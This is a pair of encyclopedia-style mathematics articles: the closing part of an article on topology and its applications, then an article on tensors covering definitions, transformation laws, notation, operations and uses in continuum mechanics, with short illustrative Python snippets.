The words nearby, arbitrarily small, and far apart can all be made precise by using open sets. Several topologies can be defined on a given space. Changing a topology consists of changing the collection of open sets. This changes which functions are continuous and which subsets are compact or connected. Metric spaces are an important class of topological spaces where the distance between any two points is defined by a function called a metric. In a metric space, an open set is a union of open disks, where an open disk of radius r centered at x is the set of all points whose distance to x is less than r (the metric axioms themselves are verified numerically in the sketch after this passage). Many common spaces are topological spaces whose topology can be defined by a metric. This is the case for the real line, the complex plane, real and complex vector spaces and Euclidean spaces. Having a metric simplifies many proofs. Algebraic topology Algebraic topology is a branch of mathematics that uses tools from algebra to study topological spaces. The basic goal is to find algebraic invariants that classify topological spaces up to homeomorphism, though usually most classify up to homotopy equivalence. The most important of these invariants are homotopy groups, homology, and cohomology. Although algebraic topology primarily uses algebra to study topological problems, using topology to solve algebraic problems is sometimes also possible. Algebraic topology, for example, allows for a convenient proof that any subgroup of a free group is again a free group. Differential topology Differential topology is the field dealing with differentiable functions on differentiable manifolds. It is closely related to differential geometry and together they make up the geometric theory of differentiable manifolds. More specifically, differential topology considers the properties and structures that require only a smooth structure on a manifold to be defined. Smooth manifolds are "softer" than manifolds with extra geometric structures, which can act as obstructions to certain types of equivalences and deformations that exist in differential topology. For instance, volume and Riemannian curvature are invariants that can distinguish different geometric structures on the same smooth manifold; that is, one can smoothly "flatten out" certain manifolds, but it might require distorting the space and affecting the curvature or volume. Geometric topology Geometric topology is a branch of topology that primarily focuses on low-dimensional manifolds (that is, spaces of dimensions 2, 3, and 4) and their interaction with geometry, but it also includes some higher-dimensional topology. Some examples of topics in geometric topology are orientability, handle decompositions, local flatness, crumpling and the planar and higher-dimensional Schönflies theorem. In high-dimensional topology, characteristic classes are a basic invariant, and surgery theory is a key theory. Low-dimensional topology is strongly geometric, as reflected in the uniformization theorem in 2 dimensions – every surface admits a constant curvature metric; geometrically, it has one of 3 possible geometries: positive curvature/spherical, zero curvature/flat, and negative curvature/hyperbolic – and the geometrization conjecture (now theorem) in 3 dimensions – every 3-manifold can be cut into pieces, each of which has one of eight possible geometries. 
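Returning to metric spaces: the Euclidean distance satisfies the defining axioms of a metric (non-negativity with identity of indiscernibles, symmetry, and the triangle inequality), and it is these axioms that make the open disks above generate a topology. A minimal sketch (our own) checking the axioms on random points of the plane:

import math, random

def d(p, q):
    """Euclidean metric on the plane."""
    return math.hypot(p[0] - q[0], p[1] - q[1])

random.seed(0)
pts = [(random.uniform(-1, 1), random.uniform(-1, 1)) for _ in range(30)]

ok = all(
    d(p, q) >= 0 and (d(p, q) == 0) == (p == q)    # non-negativity, identity
    and abs(d(p, q) - d(q, p)) < 1e-12             # symmetry
    and d(p, r) <= d(p, q) + d(q, r) + 1e-12       # triangle inequality
    for p in pts for q in pts for r in pts
)
print(ok)   # True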
2-dimensional topology can be studied as complex geometry in one variable (Riemann surfaces are complex curves) – by the uniformization theorem every conformal class of metrics is equivalent to a unique complex one, and 4-dimensional topology can be studied from the point of view of complex geometry in two variables (complex surfaces), though not every 4-manifold admits a complex structure. Generalizations Occasionally, one needs to use the tools of topology but a "set of points" is not available. In pointless topology one considers instead the lattice of open sets as the basic notion of the theory, while Grothendieck topologies are structures defined on arbitrary categories that allow the definition of sheaves on those categories, and with that the definition of general cohomology theories. Applications Biology Topology has been used to study various biological systems including molecules and nanostructures (e.g., membranous objects). In particular, circuit topology and knot theory have been extensively applied to classify and compare the topology of folded proteins and nucleic acids. Circuit topology classifies folded molecular chains based on the pairwise arrangement of their intra-chain contacts and chain crossings. Knot theory, a branch of topology, is used in biology to study the effects of certain enzymes on DNA. These enzymes cut, twist, and reconnect the DNA, causing knotting with observable effects such as slower electrophoresis. Computer science Topological data analysis uses techniques from algebraic topology to determine the large-scale structure of a set (for instance, determining if a cloud of points is spherical or toroidal). The main method used by topological data analysis is to: Replace a set of data points with a family of simplicial complexes, indexed by a proximity parameter. Analyse these topological complexes via algebraic topology – specifically, via the theory of persistent homology. Encode the persistent homology of a data set in the form of a parameterized version of a Betti number, which is called a barcode (a toy sketch of the zero-dimensional case appears at the end of this article). Several branches of programming language semantics, such as domain theory, are formalized using topology. In this context, Steve Vickers, building on work by Samson Abramsky and Michael B. Smyth, characterizes topological spaces as Boolean or Heyting algebras over open sets, which are characterized as semidecidable (equivalently, finitely observable) properties. Physics Topology is relevant to physics in areas such as condensed matter physics, quantum field theory and physical cosmology. The topological dependence of mechanical properties in solids is of interest in disciplines of mechanical engineering and materials science. Electrical and mechanical properties depend on the arrangement and network structures of molecules and elementary units in materials. The compressive strength of crumpled topologies is studied in attempts to understand the high strength-to-weight ratio of such structures, which are mostly empty space. Topology is of further significance in contact mechanics, where the dependence of stiffness and friction on the dimensionality of surface structures is the subject of interest, with applications in multi-body physics. A topological quantum field theory (or topological field theory or TQFT) is a quantum field theory that computes topological invariants. 
Although TQFTs were invented by physicists, they are also of mathematical interest, being related to, among other things, knot theory, the theory of four-manifolds in algebraic topology, and to the theory of moduli spaces in algebraic geometry. Donaldson, Jones, Witten, and Kontsevich have all won Fields Medals for work related to topological field theory. The topological classification of Calabi–Yau manifolds has important implications in string theory, as different manifolds can sustain different kinds of strings. In cosmology, topology can be used to describe the overall shape of the universe. This area of research is commonly known as spacetime topology. In condensed matter physics, a relevant application of topology comes from the possibility of obtaining one-way currents, which are currents protected from backscattering. This was first discovered in electronics with the famous quantum Hall effect, and later generalized to other areas of physics, for instance in photonics by F. D. M. Haldane. Robotics The possible positions of a robot can be described by a manifold called configuration space. In the area of motion planning, one finds paths between two points in configuration space. These paths represent a motion of the robot's joints and other parts into the desired pose. Games and puzzles Disentanglement puzzles are based on topological aspects of the puzzle's shapes and components. Fiber art In order to create a continuous join of pieces in a modular construction, it is necessary to create an unbroken path in an order which surrounds each piece and traverses each edge only once. This process is an application of the Eulerian path. Resources and research Major journals Geometry & Topology – a mathematical research journal focused on geometry and topology and their applications, published by Mathematical Sciences Publishers. Journal of Topology – a scientific journal which publishes papers of high quality and significance in topology, geometry, and adjacent areas of mathematics. Major books Munkres, James R. (2000). Topology (2nd ed.). Upper Saddle River, NJ: Prentice Hall. Willard, Stephen (2016). General Topology. Dover Books on Mathematics. Mineola, N.Y.: Dover Publications. Armstrong, M. A. (1983). Basic Topology. Undergraduate Texts in Mathematics. New York: Springer-Verlag.
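As promised under Computer science above, here is a toy sketch (our own, pure Python) of the zero-dimensional part of the persistent-homology pipeline: as the proximity parameter grows, nearby points merge into clusters, and the number of connected components at each scale is the simplest "barcode" summary of the data.

import math

def components_at_scale(points, eps):
    """Union-find count of connected components when points within
    distance eps of each other are joined (0-dimensional persistence, toy)."""
    parent = list(range(len(points)))
    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]   # path halving
            i = parent[i]
        return i
    for i in range(len(points)):
        for j in range(i + 1, len(points)):
            if math.dist(points[i], points[j]) <= eps:
                parent[find(i)] = find(j)
    return len({find(i) for i in range(len(points))})

# Two well-separated clusters: the component count drops from 4 to 2 to 1
# as the scale parameter sweeps upward; the long-lived "2" is the signal.
pts = [(0, 0), (0.1, 0.1), (5, 5), (5.1, 5.2)]
for eps in (0.05, 0.5, 10.0):
    print(eps, components_at_scale(pts, eps))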
Mathematics
Geometry and topology
null
29965
https://en.wikipedia.org/wiki/Tensor
Tensor
In mathematics, a tensor is an algebraic object that describes a multilinear relationship between sets of algebraic objects related to a vector space. Tensors may map between different objects such as vectors, scalars, and even other tensors. There are many types of tensors, including scalars and vectors (which are the simplest tensors), dual vectors, multilinear maps between vector spaces, and even some operations such as the dot product. Tensors are defined independent of any basis, although they are often referred to by their components in a basis related to a particular coordinate system; those components form an array, which can be thought of as a high-dimensional matrix. Tensors have become important in physics because they provide a concise mathematical framework for formulating and solving physics problems in areas such as mechanics (stress, elasticity, quantum mechanics, fluid mechanics, moment of inertia, ...), electrodynamics (electromagnetic tensor, Maxwell tensor, permittivity, magnetic susceptibility, ...), and general relativity (stress–energy tensor, curvature tensor, ...). In applications, it is common to study situations in which a different tensor can occur at each point of an object; for example the stress within an object may vary from one location to another. This leads to the concept of a tensor field. In some areas, tensor fields are so ubiquitous that they are often simply called "tensors". Tullio Levi-Civita and Gregorio Ricci-Curbastro popularised tensors in 1900 – continuing the earlier work of Bernhard Riemann, Elwin Bruno Christoffel, and others – as part of the absolute differential calculus. The concept enabled an alternative formulation of the intrinsic differential geometry of a manifold in the form of the Riemann curvature tensor. Definition Although seemingly different, the various approaches to defining tensors describe the same geometric concept using different language and at different levels of abstraction. As multidimensional arrays A tensor may be represented as a (potentially multidimensional) array. Just as a vector in an n-dimensional space is represented by a one-dimensional array with n components with respect to a given basis, any tensor with respect to a basis is represented by a multidimensional array. For example, a linear operator is represented in a basis as a two-dimensional square array. The numbers in the multidimensional array are known as the components of the tensor. They are denoted by indices giving their position in the array, as subscripts and superscripts, following the symbolic name of the tensor. For example, the components of an order-2 tensor T could be denoted T_ij, where i and j are indices running from 1 to n, or also by T^i_j. Whether an index is displayed as a superscript or subscript depends on the transformation properties of the tensor, described below. Thus while T_ij and T^i_j can both be expressed as n-by-n matrices, and are numerically related via index juggling, the difference in their transformation laws indicates it would be improper to add them together. The total number of indices m required to identify each component uniquely is equal to the dimension or the number of ways of an array, which is why a tensor is sometimes referred to as an m-dimensional array or an m-way array. The total number of indices is also called the order, degree or rank of a tensor, although the term "rank" generally has another meaning in the context of matrices and tensors. 
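To make the array picture concrete, a brief sketch (our own, using NumPy; the values are illustrative): a vector is a one-index array, a linear operator a two-index array, and an order-3 tensor a three-index array, with T[i, j] playing the role of T^i_j in a fixed basis.

import numpy as np

v = np.array([1.0, 2.0, 3.0])          # order 1: one index, a vector
T = np.array([[2.0, 0.0, 0.0],
              [0.0, 3.0, 0.0],
              [0.0, 0.0, 4.0]])        # order 2: a linear operator's matrix
S = np.zeros((3, 3, 3))                # order 3: three indices, a 3-way array
S[0, 1, 2] = 7.0                       # one component, labelled by 3 indices

print(v.ndim, T.ndim, S.ndim)          # 1 2 3 -- the "number of ways"
print(T @ v)                           # the operator acting on the vector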
Just as the components of a vector change when we change the basis of the vector space, the components of a tensor also change under such a transformation. Each type of tensor comes equipped with a transformation law that details how the components of the tensor respond to a change of basis. The components of a vector can respond in two distinct ways to a change of basis (see Covariance and contravariance of vectors), where the new basis vectors e'_i are expressed in terms of the old basis vectors e_j as e'_i = Σ_j R^j_i e_j = R^j_i e_j. Here R^j_i are the entries of the change of basis matrix, and in the rightmost expression the summation sign was suppressed: this is the Einstein summation convention, which will be used throughout this article. The components v^i of a column vector v transform with the inverse of the matrix R, v'^i = (R^{-1})^i_j v^j, where the prime denotes the components in the new basis. This is called a contravariant transformation law, because the vector components transform by the inverse of the change of basis. In contrast, the components w_i of a covector (or row vector) w transform with the matrix R itself, w'_i = R^j_i w_j. This is called a covariant transformation law, because the covector components transform by the same matrix as the change of basis matrix. The components of a more general tensor are transformed by some combination of covariant and contravariant transformations, with one transformation law for each index. If the transformation matrix of an index is the inverse matrix of the basis transformation, then the index is called contravariant and is conventionally denoted with an upper index (superscript). If the transformation matrix of an index is the basis transformation itself, then the index is called covariant and is denoted with a lower index (subscript). As a simple example, the matrix T of a linear operator with respect to a basis is a rectangular array that transforms under a change of basis matrix R by T' = R^{-1} T R. For the individual matrix entries, this transformation law has the form T'^{i'}_{j'} = (R^{-1})^{i'}_i T^i_j R^j_{j'}, so the tensor corresponding to the matrix of a linear operator has one covariant and one contravariant index: it is of type (1,1). Combinations of covariant and contravariant components with the same index allow us to express geometric invariants. For example, the fact that a vector is the same object in different coordinate systems can be captured by the following equations, using the formulas defined above: v = v'^i e'_i = ((R^{-1})^i_j v^j)(R^k_i e_k) = δ^k_j v^j e_k = v^k e_k = v, where δ^k_j is the Kronecker delta, which functions similarly to the identity matrix, and has the effect of renaming indices (j into k in this example). This shows several features of the component notation: the ability to re-arrange terms at will (commutativity), the need to use different indices when working with multiple objects in the same expression, the ability to rename indices, and the manner in which contravariant and covariant tensors combine so that all instances of the transformation matrix and its inverse cancel, so that expressions like v^i e_i can immediately be seen to be geometrically identical in all coordinate systems. Similarly, a linear operator, viewed as a geometric object, does not actually depend on a basis: it is just a linear map that accepts a vector as an argument and produces another vector. The transformation law for how the matrix of components of a linear operator changes with the basis is consistent with the transformation law for a contravariant vector, so that the action of a linear operator on a contravariant vector is represented in coordinates as the matrix product of their respective coordinate representations. 
That is, the components are given by (Tv)^i = T^i_j v^j. These components transform contravariantly, since (T'v')^{i'} = T'^{i'}_{j'} v'^{j'} = [(R^{-1})^{i'}_i T^i_j R^j_{j'}][(R^{-1})^{j'}_k v^k] = (R^{-1})^{i'}_i (Tv)^i. The transformation law for an order p + q tensor with p contravariant indices and q covariant indices is thus given as T'^{i'_1...i'_p}_{j'_1...j'_q} = (R^{-1})^{i'_1}_{i_1} ... (R^{-1})^{i'_p}_{i_p} T^{i_1...i_p}_{j_1...j_q} R^{j_1}_{j'_1} ... R^{j_q}_{j'_q} (checked numerically in the sketch below). Here the primed indices denote components in the new coordinates, and the unprimed indices denote the components in the old coordinates. Such a tensor is said to be of order p + q, or type (p, q). The terms "order", "type", "rank", "valence", and "degree" are all sometimes used for the same concept. Here, the term "order" or "total order" will be used for the total dimension of the array (or its generalization in other definitions), p + q = 2 in the preceding example, and the term "type" for the pair (p, q) giving the number of contravariant and covariant indices. A tensor of type (p, q) is also called a (p, q)-tensor for short. This discussion motivates the following formal definition: The definition of a tensor as a multidimensional array satisfying a transformation law traces back to the work of Ricci. An equivalent definition of a tensor uses the representations of the general linear group. There is an action of the general linear group on the set of all ordered bases of an n-dimensional vector space. If f = (f_1, ..., f_n) is an ordered basis, and R = (R^i_j) is an invertible n × n matrix, then the action is given by fR = (f_i R^i_1, ..., f_i R^i_n). Let F be the set of all ordered bases. Then F is a principal homogeneous space for GL(n). Let W be a vector space and let ρ be a representation of GL(n) on W (that is, a group homomorphism ρ: GL(n) → GL(W)). Then a tensor of type ρ is an equivariant map T: F → W. Equivariance here means that T(fR) = ρ(R^{-1}) T(f). When ρ is a tensor representation of the general linear group, this gives the usual definition of tensors as multidimensional arrays. This definition is often used to describe tensors on manifolds, and readily generalizes to other groups. As multilinear maps A downside to the definition of a tensor using the multidimensional array approach is that it is not apparent from the definition that the defined object is indeed basis independent, as is expected from an intrinsically geometric object. Although it is possible to show that transformation laws indeed ensure independence from the basis, sometimes a more intrinsic definition is preferred. One approach that is common in differential geometry is to define tensors relative to a fixed (finite-dimensional) vector space V, which is usually taken to be a particular vector space of some geometrical significance like the tangent space to a manifold. In this approach, a type (p, q) tensor T is defined as a multilinear map T: V* × ... × V* × V × ... × V → R (with p copies of the dual space V* and q copies of V), where V* is the corresponding dual space of covectors, which is linear in each of its arguments. The above assumes V is a vector space over the real numbers, R. More generally, V can be taken over any field F (e.g. the complex numbers), with F replacing R as the codomain of the multilinear maps. By applying a multilinear map T of type (p, q) to a basis {e_j} for V and a canonical cobasis {ε^i} for V*, a (p + q)-dimensional array of components T^{i_1...i_p}_{j_1...j_q} = T(ε^{i_1}, ..., ε^{i_p}, e_{j_1}, ..., e_{j_q}) can be obtained. A different choice of basis will yield different components. But, because T is linear in all of its arguments, the components satisfy the tensor transformation law used in the multilinear array definition. The multidimensional array of components of T thus form a tensor according to that definition. Moreover, such an array can be realized as the components of some multilinear map T. This motivates viewing multilinear maps as the intrinsic objects underlying tensors. 
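As flagged above, the (1,1) transformation law can be checked numerically. A short sketch (our own, using NumPy): transform a vector and an operator's component matrix to a new basis and verify that the operator's action is basis-independent.

import numpy as np

rng = np.random.default_rng(1)
T = rng.standard_normal((3, 3))   # components of a (1,1)-tensor (an operator)
v = rng.standard_normal(3)        # components of a contravariant vector
R = rng.standard_normal((3, 3))   # change-of-basis matrix (invertible here)
Rinv = np.linalg.inv(R)

v_new = Rinv @ v                  # contravariant law: v' = R^-1 v
T_new = Rinv @ T @ R              # mixed (1,1) law:   T' = R^-1 T R

# The operator applied to the vector, computed in the new basis, agrees
# with the old-basis result transformed contravariantly: T'v' = R^-1 (Tv).
print(np.allclose(T_new @ v_new, Rinv @ (T @ v)))   # True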
In viewing a tensor as a multilinear map, it is conventional to identify the double dual V** of the vector space V, i.e., the space of linear functionals on the dual vector space V*, with the vector space V. There is always a natural linear map from V to its double dual, given by evaluating a linear form in V* against a vector in V. This linear mapping is an isomorphism in finite dimensions, and it is often then expedient to identify V with its double dual. Using tensor products For some mathematical applications, a more abstract approach is sometimes useful. This can be achieved by defining tensors in terms of elements of tensor products of vector spaces, which in turn are defined through a universal property. A type (p, q) tensor is defined in this context as an element of the tensor product of vector spaces, T ∈ V ⊗ ... ⊗ V ⊗ V* ⊗ ... ⊗ V* (p factors of V and q factors of V*). A basis {v_i} of V and a basis {w_j} of W naturally induce a basis {v_i ⊗ w_j} of the tensor product V ⊗ W. The components of a tensor T are the coefficients of the tensor with respect to the basis obtained from a basis {e_i} for V and its dual basis {ε^j}, i.e. T = T^{i_1...i_p}_{j_1...j_q} e_{i_1} ⊗ ... ⊗ e_{i_p} ⊗ ε^{j_1} ⊗ ... ⊗ ε^{j_q}. Using the properties of the tensor product, it can be shown that these components satisfy the transformation law for a type (p, q) tensor. Moreover, the universal property of the tensor product gives a one-to-one correspondence between tensors defined in this way and tensors defined as multilinear maps. This one-to-one correspondence can be achieved in the following way, because in the finite-dimensional case there exists a canonical isomorphism between a vector space and its double dual: V ⊗ ... ⊗ V ⊗ V* ⊗ ... ⊗ V* ≅ V** ⊗ ... ⊗ V** ⊗ V* ⊗ ... ⊗ V* ≅ {multilinear maps V* × ... × V* × V × ... × V → F}. The last line is using the universal property of the tensor product, that there is a one-to-one correspondence between linear maps from a tensor product and multilinear maps from the corresponding Cartesian product. Tensor products can be defined in great generality – for example, involving arbitrary modules over a ring. In principle, one could define a "tensor" simply to be an element of any tensor product. However, the mathematics literature usually reserves the term tensor for an element of a tensor product of any number of copies of a single vector space V and its dual, as above. Tensors in infinite dimensions This discussion of tensors so far assumes finite dimensionality of the spaces involved, where the spaces of tensors obtained by each of these constructions are naturally isomorphic. Constructions of spaces of tensors based on the tensor product and multilinear mappings can be generalized, essentially without modification, to vector bundles or coherent sheaves. For infinite-dimensional vector spaces, inequivalent topologies lead to inequivalent notions of tensor, and these various isomorphisms may or may not hold depending on what exactly is meant by a tensor (see topological tensor product). In some applications, it is the tensor product of Hilbert spaces that is intended, whose properties are the most similar to the finite-dimensional case. A more modern view is that it is the tensors' structure as a symmetric monoidal category that encodes their most important properties, rather than the specific models of those categories. Tensor fields In many applications, especially in differential geometry and physics, it is natural to consider a tensor with components that are functions of the point in a space. This was the setting of Ricci's original work. In modern mathematical terminology such an object is called a tensor field, often referred to simply as a tensor. In this context, a coordinate basis is often chosen for the tangent vector space. 
The transformation law may then be expressed in terms of partial derivatives of the coordinate functions x̄^i(x^1, ..., x^n), defining a coordinate transformation: T'^{i'_1...i'_p}_{j'_1...j'_q}(x̄) = (∂x̄^{i'_1}/∂x^{i_1}) ... (∂x̄^{i'_p}/∂x^{i_p}) (∂x^{j_1}/∂x̄^{j'_1}) ... (∂x^{j_q}/∂x̄^{j'_q}) T^{i_1...i_p}_{j_1...j_q}(x). History The concepts of later tensor analysis arose from the work of Carl Friedrich Gauss in differential geometry, and the formulation was much influenced by the theory of algebraic forms and invariants developed during the middle of the nineteenth century. The word "tensor" itself was introduced in 1846 by William Rowan Hamilton to describe something different from what is now meant by a tensor. Gibbs introduced dyadics and polyadic algebra, which are also tensors in the modern sense. The contemporary usage was introduced by Woldemar Voigt in 1898. Tensor calculus was developed around 1890 by Gregorio Ricci-Curbastro under the title absolute differential calculus, and originally presented in 1892. It was made accessible to many mathematicians by the publication of Ricci-Curbastro and Tullio Levi-Civita's 1900 classic text Méthodes de calcul différentiel absolu et leurs applications (Methods of absolute differential calculus and their applications). In Ricci's notation, he refers to "systems" with covariant and contravariant components, which are known as tensor fields in the modern sense. In the 20th century, the subject came to be known as tensor analysis, and achieved broader acceptance with the introduction of Albert Einstein's theory of general relativity, around 1915. General relativity is formulated completely in the language of tensors. Einstein had learned about them, with great difficulty, from the geometer Marcel Grossmann. Levi-Civita then initiated a correspondence with Einstein to correct mistakes Einstein had made in his use of tensor analysis. The correspondence lasted 1915–17, and was characterized by mutual respect. Tensors and tensor fields were also found to be useful in other fields such as continuum mechanics. Some well-known examples of tensors in differential geometry are quadratic forms such as metric tensors, and the Riemann curvature tensor. The exterior algebra of Hermann Grassmann, from the middle of the nineteenth century, is itself a tensor theory, and highly geometric, but it was some time before it was seen, with the theory of differential forms, as naturally unified with tensor calculus. The work of Élie Cartan made differential forms one of the basic kinds of tensors used in mathematics, and Hassler Whitney popularized the tensor product. From about the 1920s onwards, it was realised that tensors play a basic role in algebraic topology (for example in the Künneth theorem). Correspondingly there are types of tensors at work in many branches of abstract algebra, particularly in homological algebra and representation theory. Multilinear algebra can be developed in greater generality than for scalars coming from a field. For example, scalars can come from a ring. But the theory is then less geometric and computations more technical and less algorithmic. Tensors are generalized within category theory by means of the concept of monoidal category, from the 1960s. Examples An elementary example of a mapping describable as a tensor is the dot product, which maps two vectors to a scalar. 
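A quick sketch (our own, with NumPy) of the dot product viewed this way: its components in an orthonormal basis form the identity-like array g_ij = δ_ij, and feeding it two vectors via index contraction returns the familiar scalar.

import numpy as np

g = np.eye(3)                    # components of the dot product, g_ij
u = np.array([1.0, 2.0, 3.0])
v = np.array([4.0, 5.0, 6.0])

# A (0,2)-tensor eats two vectors and returns a scalar: g_ij u^i v^j.
s = np.einsum('ij,i,j->', g, u, v)
print(s, np.dot(u, v))           # 32.0 32.0 -- the same bilinear map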
A more complex example is the Cauchy stress tensor T, which takes a directional unit vector v as input and maps it to the stress vector T(v), which is the force (per unit area) exerted by material on the negative side of the plane orthogonal to v against the material on the positive side of the plane, thus expressing a relationship between these two vectors. The cross product, where two vectors are mapped to a third one, is strictly speaking not a tensor because it changes its sign under those transformations that change the orientation of the coordinate system. The totally anti-symmetric symbol ε_ijk nevertheless allows a convenient handling of the cross product in equally oriented three dimensional coordinate systems. Important examples of tensors on vector spaces and tensor fields on manifolds are conventionally arranged in a table (not reproduced here) classified according to their type (n, m), where n is the number of contravariant indices, m is the number of covariant indices, and n + m gives the total order of the tensor. For example, a bilinear form is the same thing as a (0, 2)-tensor; an inner product is an example of a (0, 2)-tensor, but not all (0, 2)-tensors are inner products. In the (0, M)-entry of such a table, M denotes the dimensionality of the underlying vector space or manifold because for each dimension of the space, a separate index is needed to select that dimension to get a maximally covariant antisymmetric tensor. Raising an index on an (n, m)-tensor produces an (n + 1, m − 1)-tensor; this corresponds to moving diagonally down and to the left on the table. Symmetrically, lowering an index corresponds to moving diagonally up and to the right on the table. Contraction of an upper with a lower index of an (n, m)-tensor produces an (n − 1, m − 1)-tensor; this corresponds to moving diagonally up and to the left on the table. Properties Assuming a basis of a real vector space, e.g., a coordinate frame in the ambient space, a tensor can be represented as an organized multidimensional array of numerical values with respect to this specific basis. Changing the basis transforms the values in the array in a characteristic way that allows defining tensors as objects adhering to this transformational behavior. For example, there are invariants of tensors that must be preserved under any change of the basis, thereby making only certain multidimensional arrays of numbers a tensor. Compare this to the array representing ε_ijk not being a tensor, for the sign change under transformations changing the orientation. Because the components of vectors and their duals transform differently under the change of their dual bases, there is a covariant and/or contravariant transformation law that relates the arrays, which represent the tensor with respect to one basis and that with respect to the other one. The numbers of, respectively, vectors (contravariant indices) and dual vectors (covariant indices) in the input and output of a tensor determine the type (or valence) of the tensor, a pair of natural numbers (n, m), which determine the precise form of the transformation law. The order of a tensor is the sum of these two numbers. The order (also degree or rank) of a tensor is thus the sum of the orders of its arguments plus the order of the resulting tensor. This is also the dimensionality of the array of numbers needed to represent the tensor with respect to a specific basis, or equivalently, the number of indices needed to label each component in that array. 
For example, in a fixed basis, a standard linear map that maps a vector to a vector is represented by a matrix (a 2-dimensional array), and therefore is a 2nd-order tensor. A simple vector can be represented as a 1-dimensional array, and is therefore a 1st-order tensor. Scalars are simple numbers and are thus 0th-order tensors. This way the tensor representing the scalar product, taking two vectors and resulting in a scalar, has order 2 + 0 = 2, the same as the stress tensor, taking one vector and returning another, with 1 + 1 = 2. The symbol ε_ijk, mapping two vectors to one vector, would have order 2 + 1 = 3. The collection of tensors on a vector space and its dual forms a tensor algebra, which allows products of arbitrary tensors. Simple applications of tensors of order 2, which can be represented as a square matrix, can be solved by clever arrangement of transposed vectors and by applying the rules of matrix multiplication, but the tensor product should not be confused with this. Notation There are several notational systems that are used to describe tensors and perform calculations involving them. Ricci calculus Ricci calculus is the modern formalism and notation for tensor indices: indicating inner and outer products, covariance and contravariance, summations of tensor components, symmetry and antisymmetry, and partial and covariant derivatives. Einstein summation convention The Einstein summation convention dispenses with writing summation signs, leaving the summation implicit. Any repeated index symbol is summed over: if the index i is used twice in a given term of a tensor expression, it means that the term is to be summed for all i. Several distinct pairs of indices may be summed this way. Penrose graphical notation Penrose graphical notation is a diagrammatic notation which replaces the symbols for tensors with shapes, and their indices by lines and curves. It is independent of basis elements, and requires no symbols for the indices. Abstract index notation The abstract index notation is a way to write tensors such that the indices are no longer thought of as numerical, but rather are indeterminates. This notation captures the expressiveness of indices and the basis-independence of index-free notation. Component-free notation A component-free treatment of tensors uses notation that emphasises that tensors do not rely on any basis, and is defined in terms of the tensor product of vector spaces. Operations There are several operations on tensors that again produce a tensor. The linear nature of tensors implies that two tensors of the same type may be added together, and that tensors may be multiplied by a scalar with results analogous to the scaling of a vector. On components, these operations are simply performed component-wise. These operations do not change the type of the tensor; but there are also operations that produce a tensor of different type. Tensor product The tensor product takes two tensors, S and T, and produces a new tensor, S ⊗ T, whose order is the sum of the orders of the original tensors. When described as multilinear maps, the tensor product simply multiplies the two tensors, i.e., (S ⊗ T)(v_1, ..., v_n, w_1, ..., w_m) = S(v_1, ..., v_n) T(w_1, ..., w_m), which again produces a map that is linear in all its arguments. On components, the effect is to multiply the components of the two input tensors pairwise, i.e., (S ⊗ T)^{i...k...}_{j...m...} = S^{i...}_{j...} T^{k...}_{m...}. If S is of type (l, k) and T is of type (n, m), then the tensor product S ⊗ T has type (l + n, k + m). Contraction Tensor contraction is an operation that reduces a type (n, m) tensor to a type (n − 1, m − 1) tensor, of which the trace is a special case. It thereby reduces the total order of a tensor by two. 
The operation is achieved by summing components for which one specified contravariant index is the same as one specified covariant index to produce a new component. Components for which those two indices are different are discarded. For example, a (1, 1)-tensor T^i_j can be contracted to a scalar through T^i_i, where the summation is again implied. When the (1, 1)-tensor is interpreted as a linear map, this operation is known as the trace. The contraction is often used in conjunction with the tensor product to contract an index from each tensor. The contraction can also be understood using the definition of a tensor as an element of a tensor product of copies of the space V with the space V* by first decomposing the tensor into a linear combination of simple tensors, and then applying a factor from V* to a factor from V. For example, a tensor T ∈ V ⊗ V ⊗ V* can be written as a linear combination T = v_1 ⊗ w_1 ⊗ α_1 + v_2 ⊗ w_2 ⊗ α_2 + ... + v_N ⊗ w_N ⊗ α_N. The contraction of T on the first and last slots is then the vector α_1(v_1) w_1 + α_2(v_2) w_2 + ... + α_N(v_N) w_N. In a vector space with an inner product (also known as a metric) g, the term contraction is used for removing two contravariant or two covariant indices by forming a trace with the metric tensor or its inverse. For example, a (2, 0)-tensor T^{ij} can be contracted to a scalar through g_{ij} T^{ij} (yet again assuming the summation convention). Raising or lowering an index When a vector space is equipped with a nondegenerate bilinear form (or metric tensor as it is often called in this context), operations can be defined that convert a contravariant (upper) index into a covariant (lower) index and vice versa. A metric tensor is a (symmetric) (0, 2)-tensor; it is thus possible to contract an upper index of a tensor with one of the lower indices of the metric tensor in the product. This produces a new tensor with the same index structure as the previous tensor, but with lower index generally shown in the same position of the contracted upper index. This operation is quite graphically known as lowering an index. Conversely, the inverse operation can be defined, and is called raising an index. This is equivalent to a similar contraction on the product with a (2, 0)-tensor. This inverse metric tensor has components that are the matrix inverse of those of the metric tensor. Applications Continuum mechanics Important examples are provided by continuum mechanics. The stresses inside a solid body or fluid are described by a tensor field. The stress tensor and strain tensor are both second-order tensor fields, and are related in a general linear elastic material by a fourth-order elasticity tensor field. In detail, the tensor quantifying stress in a 3-dimensional solid object has components that can be conveniently represented as a 3 × 3 array. The three faces of a cube-shaped infinitesimal volume segment of the solid are each subject to some given force. The force's vector components are also three in number. Thus, 3 × 3, or 9 components are required to describe the stress at this cube-shaped infinitesimal segment. Within the bounds of this solid is a whole mass of varying stress quantities, each requiring 9 quantities to describe. Thus, a second-order tensor is needed. If a particular surface element inside the material is singled out, the material on one side of the surface will apply a force on the other side. In general, this force will not be orthogonal to the surface, but it will depend on the orientation of the surface in a linear manner. This is described by a tensor of type (2, 0), in linear elasticity, or more precisely by a tensor field of type (2, 0), since the stresses may vary from point to point. 
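The contraction and index-lowering operations described above are one-liners in component form. A brief sketch (our own, NumPy/einsum; a Euclidean metric is assumed purely for illustration):

import numpy as np

T = np.arange(9.0).reshape(3, 3)        # components T^i_j of a (1,1)-tensor
g = np.eye(3)                           # metric g_ij (Euclidean, illustrative)
g_inv = np.linalg.inv(g)                # inverse metric g^ij

trace = np.einsum('ii->', T)            # contraction T^i_i: the trace
lowered = np.einsum('ik,kj->ij', g, T)  # lowering: T_ij = g_ik T^k_j
raised = np.einsum('ik,kj->ij', g_inv, lowered)   # raising recovers T^i_j

print(trace)                            # 12.0
print(np.allclose(raised, T))           # True: raising undoes lowering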
